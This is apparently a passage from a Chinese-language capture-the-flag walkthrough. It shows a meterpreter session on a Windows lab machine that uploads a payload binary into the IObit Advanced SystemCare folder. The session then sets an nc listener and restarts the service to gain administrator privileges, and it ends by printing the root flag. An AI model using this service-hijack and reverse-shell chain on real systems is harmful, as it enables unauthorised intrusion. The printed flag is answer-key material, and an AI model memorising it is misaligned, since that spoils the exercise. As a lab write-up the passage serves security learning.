100777/rwxrwxrwx  3360032  fil   2016-04-23 08:40:54 +0800  UninstallPromote.exe
040777/rwxrwxrwx  4096     dir   2019-09-27 16:32:33 +0800  Update
100666/rw-rw-rw-  8386     fil   2016-07-28 05:09:38 +0800  Update History.txt
100777/rwxrwxrwx  1355552  fil   2016-07-22 05:32:12 +0800  Wizard.exe
100666/rw-rw-rw-  1407264  fil   2015-12-29 04:49:04 +0800  cpuidsdk.dll
100666/rw-rw-rw-  72992    fil   2015-12-29 04:49:06 +0800  datastate.dll
100777/rwxrwxrwx  242464   fil   2015-12-29 04:49:08 +0800  delayLoad.exe
040777/rwxrwxrwx  4096     dir   2019-09-26 23:17:45 +0800  drivers
100666/rw-rw-rw-  5430     fil   2011-02-10 07:46:46 +0800  fav.ico
100666/rw-rw-rw-  190240   fil   2015-12-24 09:32:36 +0800  madbasic_.bpl
100666/rw-rw-rw-  57632    fil   2015-12-24 09:32:38 +0800  maddisAsm_.bpl
100666/rw-rw-rw-  355616   fil   2015-12-24 09:32:40 +0800  madexcept_.bpl
100777/rwxrwxrwx  1436448  fil   2015-12-29 04:50:10 +0800  repair task.exe
100666/rw-rw-rw-  1108256  fil   2015-12-24 09:32:44 +0800  rtl120.bpl
100666/rw-rw-rw-  227104   fil   2015-12-29 04:50:30 +0800  sdcore.dll
100666/rw-rw-rw-  117536   fil   2015-12-29 04:50:32 +0800  sdlib.dll
040777/rwxrwxrwx  0        dir   2019-09-26 23:17:45 +0800  skin
100777/rwxrwxrwx  623904   fil   2016-07-26 01:01:12 +0800  smBootTime.exe
100666/rw-rw-rw-  694192   fil   2015-12-29 04:50:44 +0800  sqlite3.dll
100666/rw-rw-rw-  338720   fil   2015-12-29 04:50:52 +0800  taskmgr.dll
100666/rw-rw-rw-  119304   fil   2019-09-26 23:17:45 +0800  unins000.dat
100777/rwxrwxrwx  1208608  fil   2019-09-26 23:17:36 +0800  unins000.exe
100666/rw-rw-rw-  22701    fil   2019-09-26 23:17:45 +0800  unins000.msg
100666/rw-rw-rw-  2008864  fil   2015-12-24 09:32:46 +0800  vcl120.bpl
100666/rw-rw-rw-  222496   fil   2015-12-24 09:32:48 +0800  vclx120.bpl
100666/rw-rw-rw-  899872   fil   2015-12-29 04:50:58 +0800  webres.dll
100666/rw-rw-rw-  580      fil   2015-10-11 05:33:18 +0800  winid.dat


meterpreter > upload ~/Advanced.exe
[*] uploading  : /home/zacarx/Advanced.exe -> Advanced.exe
[*] Uploaded 15.50 KiB of 15.50 KiB (100.0%): /home/zacarx/Advanced.exe -> Advanced.exe
[*] uploaded   : /home/zacarx/Advanced.exe -> Advanced.exe
meterpreter > ls
Listing: C:\Program Files (x86)\IObit\Advanced SystemCare
=========================================================

Mode              Size     Type  Last modified              Name
----              ----     ----  -------------              ----
100777/rwxrwxrwx  5091616  fil   2016-08-17 02:03:56 +0800  ASC.exe
100777/rwxrwxrwx  691488   fil   2015-12-29 04:48:34 +0800  ASCDownload.exe
100666/rw-rw-rw-  166176   fil   2015-12-29 04:47:32 +0800  ASCExtMenu.dll
100666/rw-rw-rw-  187680   fil   2015-12-29 04:47:30 +0800  ASCExtMenu_64.dll
100777/rwxrwxrwx  574240   fil   2016-03-04 08:16:34 +0800  ASCInit.exe
100666/rw-rw-rw-  743      fil   2019-09-26 23:17:50 +0800  ASCInit.log
100777/rwxrwxrwx  452384   fil   2016-07-26 01:01:08 +0800  ASCService.exe
100666/rw-rw-rw-  104270   fil   2022-10-26 15:12:56 +0800  ASCService.log
040777/rwxrwxrwx  0        dir   2019-09-26 23:17:49 +0800  ASCServiceLog
100777/rwxrwxrwx  2023712  fil   2016-07-28 02:24:22 +0800  ASCTray.exe
100777/rwxrwxrwx  555808   fil   2015-12-29 05:06:42 +0800  ASCUpgrade.exe
100777/rwxrwxrwx  2400528  fil   2019-09-26 23:18:22 +0800  ASCVER.exe
100777/rwxrwxrwx  599328   fil   2015-12-29 04:48:46 +0800  AUpdate.exe
100666/rw-rw-rw-  64800    fil   2015-12-29 04:48:24 +0800  About.dll
100777/rwxrwxrwx  310560   fil   2016-07-28 02:24:20 +0800  About.exe
100666/rw-rw-rw-  21506    fil   2019-09-26 23:18:14 +0800  ActionCenter2.log
100777/rwxrwxrwx  2254624  fil   2016-01-08 09:13:48 +0800  ActionCenterDownloader.exe
100777/rwxrwxrwx  15872    fil   2022-10-26 15:16:17 +0800  Advanced.exe
100777/rwxrwxrwx  1917728  fil   2016-04-30 02:12:38 +0800  AutoCare.exe
100777/rwxrwxrwx  191264   fil   2015-12-29 04:52:24 +0800  AutoReactivator.exe
100777/rwxrwxrwx  1194784  fil   2016-04-30 02:12:40 +0800  AutoSweep.exe
100777/rwxrwxrwx  1403680  fil   2016-07-21 00:15:38 +0800  AutoUpdate.exe
100666/rw-rw-rw-  18536    fil   2019-09-27 16:32:33 +0800  AutoUpdate.log
040777/rwxrwxrwx  0        dir   2019-09-26 23:17:46 +0800  Backup
100777/rwxrwxrwx  1063200  fil   2016-03-08 02:14:22 +0800  BrowserCleaner.exe
100666/rw-rw-rw-  131872   fil   2016-07-21 00:15:42 +0800  CPUIDInterface.dll
040777/rwxrwxrwx  0        dir   2019-09-26 23:17:42 +0800  Config
100777/rwxrwxrwx  451872   fil   2015-12-29 04:49:22 +0800  DNSProtect.exe
100777/rwxrwxrwx  513528   fil   2016-04-13 04:10:24 +0800  Dashlane_Launcher.exe
040777/rwxrwxrwx  8192     dir   2019-09-26 23:17:51 +0800  Database
100777/rwxrwxrwx  2172704  fil   2016-05-07 00:50:26 +0800  DefaultProgram.exe
100666/rw-rw-rw-  11220    fil   2016-02-23 02:18:02 +0800  DetectionEx.ini
100777/rwxrwxrwx  438560   fil   2016-01-12 04:30:04 +0800  DiskDefrag.exe
100666/rw-rw-rw-  607520   fil   2015-12-29 04:49:12 +0800  DiskMap.dll
100666/rw-rw-rw-  127776   fil   2016-07-21 00:15:44 +0800  DiskScan.dll
100777/rwxrwxrwx  72992    fil   2015-12-29 04:49:16 +0800  DiskScan.exe
100777/rwxrwxrwx  110368   fil   2016-01-12 09:54:36 +0800  Display.exe
100666/rw-rw-rw-  586      fil   2022-10-26 14:03:06 +0800  Display_log.txt
100666/rw-rw-rw-  14716    fil   2013-07-20 09:31:32 +0800  DownloadApplication.xml
100666/rw-rw-rw-  81539    fil   2016-01-08 05:10:46 +0800  EULA.rtf
100777/rwxrwxrwx  1221408  fil   2016-07-21 00:15:46 +0800  FeedBack.exe
100666/rw-rw-rw-  454432   fil   2015-12-29 05:06:54 +0800  FfSweep.dll
100777/rwxrwxrwx  4939536  fil   2019-09-26 23:18:20 +0800  FreeBigupgrade1211.exe
100777/rwxrwxrwx  1019680  fil   2015-12-29 05:10:30 +0800  Homepage.exe
100666/rw-rw-rw-  750880   fil   2016-01-21 09:23:28 +0800  HomepageSvc.dll
100666/rw-rw-rw-  387360   fil   2016-03-04 04:21:28 +0800  ICONPIN32.dll
100777/rwxrwxrwx  380192   fil   2016-03-04 04:21:30 +0800  ICONPIN32.exe
100666/rw-rw-rw-  614176   fil   2016-03-04 04:21:34 +0800  ICONPIN64.dll
100777/rwxrwxrwx  582944   fil   2016-03-04 04:21:36 +0800  ICONPIN64.exe
100777/rwxrwxrwx  9474336  fil   2016-07-09 05:42:24 +0800  IObitUninstaller.exe
100666/rw-rw-rw-  899872   fil   2016-07-21 00:15:50 +0800  InfoHelp.dll
100777/rwxrwxrwx  21280    fil   2016-03-10 07:56:44 +0800  Iobit_RefreshTaskBar.exe
100666/rw-rw-rw-  15       fil   2014-07-23 05:15:36 +0800  Lang.dat
040777/rwxrwxrwx  8192     dir   2019-09-26 23:17:42 +0800  Language
040777/rwxrwxrwx  4096     dir   2019-09-26 23:18:19 +0800  LatestNews
040777/rwxrwxrwx  4096     dir   2019-09-26 23:17:45 +0800  LinkImages
100777/rwxrwxrwx  2960672  fil   2016-07-21 00:15:54 +0800  LiveUpdate.exe
100666/rw-rw-rw-  768      fil   2019-09-26 23:17:49 +0800  LiveUpdate.log
100777/rwxrwxrwx  667424   fil   2015-12-29 04:49:32 +0800  LocalLang.exe
100777/rwxrwxrwx  1530656  fil   2016-07-21 00:15:56 +0800  Monitor.exe
100777/rwxrwxrwx  533792   fil   2015-12-29 04:49:38 +0800  MonitorDisk.exe
100777/rwxrwxrwx  2111776  fil   2016-04-30 02:12:52 +0800  MyWin10.exe
100777/rwxrwxrwx  569632   fil   2016-07-23 01:20:00 +0800  Nfeatures.exe
100777/rwxrwxrwx  116000   fil   2015-12-29 04:49:40 +0800  NoteIcon.exe
100666/rw-rw-rw-  48416    fil   2015-12-29 04:49:44 +0800  NtfsData.dll
100666/rw-rw-rw-  784160   fil   2016-07-21 00:16:04 +0800  OFCommon.dll
100777/rwxrwxrwx  918816   fil   2016-07-21 00:16:06 +0800  PPUninstaller.exe
100666/rw-rw-rw-  70432    fil   2015-12-29 04:49:52 +0800  PowerConfig.dll
100666/rw-rw-rw-  629536   fil   2015-12-29 04:49:58 +0800  ProductStatistics.dll
100777/rwxrwxrwx  1044256  fil   2016-07-28 02:24:26 +0800  QuickSettings.exe
100777/rwxrwxrwx  152352   fil   2015-12-29 04:50:18 +0800  ReProcess.exe
100777/rwxrwxrwx  719648   fil   2015-12-29 04:50:02 +0800  RealTimeProtector.exe
100777/rwxrwxrwx  2052896  fil   2016-05-10 04:22:08 +0800  Register.exe
100777/rwxrwxrwx  1094944  fil   2016-07-28 02:24:28 +0800  Reinforce.exe
100666/rw-rw-rw-  1406     fil   2019-09-26 23:18:14 +0800  Reinforce.log
100777/rwxrwxrwx  490272   fil   2016-01-05 05:44:00 +0800  Report.exe
100777/rwxrwxrwx  1723680  fil   2016-07-21 09:07:08 +0800  RescueCenter.exe
100777/rwxrwxrwx  1326504  fil   2015-12-26 03:55:20 +0800  SPInit.exe
100777/rwxrwxrwx  8383688  fil   2016-07-29 01:07:04 +0800  SPSetup.exe
100666/rw-rw-rw-  783136   fil   2015-12-29 04:45:54 +0800  SPUrlScanner.dll
100666/rw-rw-rw-  1293088  fil   2015-12-29 04:50:24 +0800  Scan.dll
100777/rwxrwxrwx  802592   fil   2016-04-27 05:00:24 +0800  ScreenShot.exe
100666/rw-rw-rw-  1024000  fil   2022-10-26 14:03:29 +0800  SecurityHoleScan.log
100777/rwxrwxrwx  1887520  fil   2016-07-21 00:16:18 +0800  SendBugReportNew.exe
100777/rwxrwxrwx  1720096  fil   2016-01-12 04:30:12 +0800  SoftUpdateTip.exe
100666/rw-rw-rw-  202      fil   2019-09-26 23:18:13 +0800  SpeedUp.log
100777/rwxrwxrwx  897824   fil   2015-12-29 04:50:46 +0800  StartupInfo.exe
100777/rwxrwxrwx  2630944  fil   2016-07-28 02:26:32 +0800  Suc11_RegistryCleaner.exe
100777/rwxrwxrwx  1179936  fil   2016-07-21 00:30:20 +0800  Suc12_DiskCleaner.exe
100777/rwxrwxrwx  561440   fil   2016-01-06 09:47:42 +0800  Suo10_SmartRAM.exe
100777/rwxrwxrwx  1767712  fil   2016-07-21 00:30:26 +0800  Suo11_InternetBooster.exe
100777/rwxrwxrwx  4190496  fil   2016-07-21 00:30:28 +0800  Suo12_StartupManager.exe
100777/rwxrwxrwx  1421088  fil   2016-05-07 00:50:38 +0800  Sur13_WinFix.exe
100666/rw-rw-rw-  82720    fil   2015-12-29 04:50:48 +0800  SysRest.dll
100777/rwxrwxrwx  607520   fil   2015-12-29 04:50:50 +0800  TaskHelper.exe
040777/rwxrwxrwx  8192     dir   2019-09-26 23:17:42 +0800  Toolbox_Language
100777/rwxrwxrwx  3360032  fil   2016-04-23 08:40:54 +0800  UninstallPromote.exe
040777/rwxrwxrwx  4096     dir   2019-09-27 16:32:33 +0800  Update
100666/rw-rw-rw-  8386     fil   2016-07-28 05:09:38 +0800  Update History.txt
100777/rwxrwxrwx  1355552  fil   2016-07-22 05:32:12 +0800  Wizard.exe
100666/rw-rw-rw-  1407264  fil   2015-12-29 04:49:04 +0800  cpuidsdk.dll
100666/rw-rw-rw-  72992    fil   2015-12-29 04:49:06 +0800  datastate.dll
100777/rwxrwxrwx  242464   fil   2015-12-29 04:49:08 +0800  delayLoad.exe
040777/rwxrwxrwx  4096     dir   2019-09-26 23:17:45 +0800  drivers
100666/rw-rw-rw-  5430     fil   2011-02-10 07:46:46 +0800  fav.ico
100666/rw-rw-rw-  190240   fil   2015-12-24 09:32:36 +0800  madbasic_.bpl
100666/rw-rw-rw-  57632    fil   2015-12-24 09:32:38 +0800  maddisAsm_.bpl
100666/rw-rw-rw-  355616   fil   2015-12-24 09:32:40 +0800  madexcept_.bpl
100777/rwxrwxrwx  1436448  fil   2015-12-29 04:50:10 +0800  repair task.exe
100666/rw-rw-rw-  1108256  fil   2015-12-24 09:32:44 +0800  rtl120.bpl
100666/rw-rw-rw-  227104   fil   2015-12-29 04:50:30 +0800  sdcore.dll
100666/rw-rw-rw-  117536   fil   2015-12-29 04:50:32 +0800  sdlib.dll
040777/rwxrwxrwx  0        dir   2019-09-26 23:17:45 +0800  skin
100777/rwxrwxrwx  623904   fil   2016-07-26 01:01:12 +0800  smBootTime.exe
100666/rw-rw-rw-  694192   fil   2015-12-29 04:50:44 +0800  sqlite3.dll
100666/rw-rw-rw-  338720   fil   2015-12-29 04:50:52 +0800  taskmgr.dll
100666/rw-rw-rw-  119304   fil   2019-09-26 23:17:45 +0800  unins000.dat
100777/rwxrwxrwx  1208608  fil   2019-09-26 23:17:36 +0800  unins000.exe
100666/rw-rw-rw-  22701    fil   2019-09-26 23:17:45 +0800  unins000.msg
100666/rw-rw-rw-  2008864  fil   2015-12-24 09:32:46 +0800  vcl120.bpl
100666/rw-rw-rw-  222496   fil   2015-12-24 09:32:48 +0800  vclx120.bpl
100666/rw-rw-rw-  899872   fil   2015-12-29 04:50:58 +0800  webres.dll
100666/rw-rw-rw-  580      fil   2015-10-11 05:33:18 +0800  winid.dat


meterpreter > shell
Process 2712 created.
Channel 8 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Program Files (x86)\IObit>sc start AdvancedSystemCareService9
sc start AdvancedSystemCareService9
[SC] StartService FAILED 1056:

An instance of the service is already running.

C:\Program Files (x86)\IObit>sc stop AdvancedSystemCareService9     
sc stop AdvancedSystemCareService9

SERVICE_NAME: AdvancedSystemCareService9 
        TYPE               : 110  WIN32_OWN_PROCESS  (interactive)
        STATE              : 4  RUNNING 
                                (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

我们先建立监听

nc -lnvp 4443

然后再进行启动操作

C:\Program Files (x86)\IObit>sc start AdvancedSystemCareService9
sc start AdvancedSystemCareService9

SERVICE_NAME: AdvancedSystemCareService9 
        TYPE               : 110  WIN32_OWN_PROCESS  (interactive)
        STATE              : 2  START_PENDING 
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x7d0
        PID                : 2384
        FLAGS              : 

然后我们就可以得到root权限了

C:\Users\Administrator\Desktop>type root.txt     
type root.txt
9af5f314f57607c00fd09803a587db80